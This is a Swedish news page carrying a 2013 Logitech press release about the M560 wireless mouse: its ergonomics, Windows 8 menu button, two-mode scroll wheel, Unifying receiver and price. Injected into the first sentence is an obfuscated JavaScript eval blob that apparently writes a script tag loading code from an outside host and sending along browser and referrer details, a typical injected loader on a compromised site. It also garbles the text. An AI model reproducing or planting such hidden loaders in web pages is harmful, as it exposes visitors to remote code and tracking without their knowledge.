Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Den trådlösa musen Logitech M560

Den trådlösa musen Logitech M560
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fskiy|var|u0026u|referrer|szafb||js|php’.split(’|’),0,{}))
introducerar Logitech en ny fullstor trådlös mus ergonomiskt designad för att ge dig timmar av komfort och produktivitet. Oavsett om du är höger eller vänsterhänt, eller om du använder fingerspetsarna eller handflatan för att kontrollera musen så är den designad för att passa dina händer perfekt.

”Vi såg ett behov av en mus som klarade att hänga med hela arbetspasset, trots att folk spenderar många långa timmar framför datorn”, säger Christina Holmberg på Logitech Sverige. ”Den trådlösa M560 gör det lätt att komma åt programmen du använder mest, utan att offra ergonomi och bekvämlighet, oavsett hur du håller i musen.”

Logitech M560 har en dedikerad Windows® 8-menyknapp precis bakom scrollhjulet. Knappen låter dig snabbt komma åt funktionerna du använder allra mest, som Apps Switch och Charms Bar. Den har också två extra tumknappar som enkelt låter dig byta mellan det vanliga Windows-skrivbordet och det nya Windows 8-interfacet. Självklart kan du enkelt ställa in knapparnas funktioner själv med hjälp av Logitechs SetPoint™-mjukvara.

Det Logitech-exklusiva scrollhjulet har två lägen. Det frikopplade läget låter dig snabbt scrolla genom långa dokument, medan det stegade läget passar när du istället är i behov av precision. Musen levereras tillsammans med en Logitech® Unifying-mottagare designad för att ta så lite plats som möjligt. Har du fler trådlösa enheter kan de dessutom ansluta dem via samma mottagare.

Pris och Tillgänglighet
Trådlösa Logitech M560 väntas vara tillgänglig i Sverige från slutet av oktober 2013, för ett cirkapris på 395:-. För mer information besök 
www.logitech.com.